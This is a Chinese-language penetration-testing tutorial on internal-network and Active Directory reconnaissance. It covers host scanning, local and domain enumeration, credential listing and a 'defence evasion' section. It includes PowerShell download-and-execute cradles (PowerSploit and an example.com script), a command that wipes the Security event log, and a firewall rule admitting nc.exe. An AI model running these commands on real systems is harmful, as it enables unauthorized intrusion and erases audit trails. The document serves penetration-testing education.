内网渗透测试：域内信息收集技术详解

一、域内存活主机探测技术

1. NetBIOS探测技术

• 工具：Nbtscan
• 下载地址：http://unixwiz.net/tools/nbtscan.html#download
• 命令：

  nbtscan.exe IP
  

• 关键标识：
  • ShARING：表示该机器运行文件和打印共享服务
  • DC：可能为域控制器

2. ICMP协议探测

• 方法：使用ping命令批量扫描
• 命令：

  for /L %I in (1,1,254) Do @ping -w 1 -n 1 192.168.1.%I | findstr "TTL="
  

3. ARP扫描技术

• 工具：arp-scan
• 命令：

  arp-scan -t 192.168.1.0/24
  

4. TCP/UDP端口扫描

• 工具：scanline
• 命令：

  sl -h -t 22,80-89,110,389,445,3389,8080,3306 -u 53,161,137,139 -O C:\sl.txt -p 192.168.1.1-254 /b
  

• 参数说明：
  • -t：指定TCP端口范围
  • -u：指定UDP端口
  • -O：输出结果文件
  • /b：扫描整个192.168.1网段

5. PowerShell无文件扫描

• 脚本地址：https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/Invoke-Portscan.ps1
• 命令：

  powershell.exe -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/Invoke-Portscan.ps1');Invoke-Portscan -Hosts 192.168.1.1 -T 4 -ports '445,1433,80,8080,3389'"
  

二、本机信息收集技术

1. 网络配置查询

• 命令：

  ipconfig /all
  

• 获取信息：
  • IP地址
  • 主机名
  • 域名信息
  • DNS配置

2. 用户列表查询

• 命令：

  net user                  # 查看本机用户列表
  net localgroup administrator  # 查看本机管理员(可能包含域用户)
  query user || qwinsta     # 查看在线用户
  

3. 进程列表查询

• 命令：

  tasklist /v
  或
  wmic process list brief
  

• 分析要点：
  • 杀毒软件进程
  • 运行进程的用户名
  • 虚拟机相关进程

4. 系统及软件信息

• 操作系统信息：

  systeminfo |findstr /B /C:"OS name" /C:"OS version"
  

• 安装软件信息：

  wmic product get name,version
  或
  powershell "Get-WmiObject -class Win32_Product |Select-Object -Property name,version"
  

5. 端口列表查询

• 命令：

  netstat -ano
  

• 分析要点：
  • 开放的服务端口(80/8081可能为Web服务)
  • 53端口可能为DNS服务器
  • 代理服务器特征(多台机器连接)

6. 补丁列表查询

• 命令：

  systeminfo
  或
  wmic qfe get description,installedOn
  

• 利用价值：通过未安装补丁判断可利用漏洞

7. 共享资源查询

• 命令：

  net share
  或
  wmic share get name,path,status
  

8. 防火墙配置

• 查询配置：

  netsh firewall show config
  

• 自定义日志位置：

  netsh advfirewall set currentprofile logging filename "C:\windows\temp\fw.log"
  

• 修改规则：
  • 允许程序连接：

    netsh advfirewall firewall add rule name="pass nc" dir=in action=allow program="C:\nc.exe"
    

  • 允许端口放行(如3389)：

    netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow
    

9. 远程连接服务

• 查询RDP端口：

  REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber
  

  • 注：返回值为十六进制，需转换为十进制(如d3d→3389)

• 开启远程桌面：

  • Windows Server 2008/2012：

    wmic /namespace:\\root\cimv2\terminalservices path ...
    

三、工作组信息收集

1. 域信息查询

• 命令：

  net view /domain      # 查看域列表
  net view /domain:域名  # 查看指定域内计算机
  

2. 域控制器定位

• 命令：

  nltest /dclist:域名
  或
  nslookup -type=SRV _ldap._tcp.域名
  

3. 域用户查询

• 命令：

  net user /domain          # 查询域用户
  net group "Domain Admins" /domain  # 查询域管理员
  

四、高级信息收集技术

1. WMI信息收集

• 系统信息：

  wmic computersystem list full /format:list
  

• BIOS信息：

  wmic bios list full /format:list
  

2. 计划任务查询

• 命令：

  schtasks /query /fo LIST /v
  

3. 注册表信息收集

• 自动启动项：

  reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
  

4. 凭证收集

• 保存的凭据：

  cmdkey /list
  

五、防御规避技术

1. 日志清除

• 命令：

  wevtutil cl security
  

2. 隐蔽执行

• 无文件执行：

  powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://example.com/script.ps1')"
  

六、总结

本技术文档详细介绍了内网渗透测试中的信息收集技术，包括：

1. 存活主机探测的多种方法
2. 本机信息全面收集技术
3. 域环境信息收集方法
4. 高级信息收集和防御规避技术

这些技术为内网渗透测试提供了全面的信息收集手段，有助于后续的横向移动和权限提升操作。在实际渗透测试中，应根据目标环境特点选择合适的技术组合，并注意操作的隐蔽性。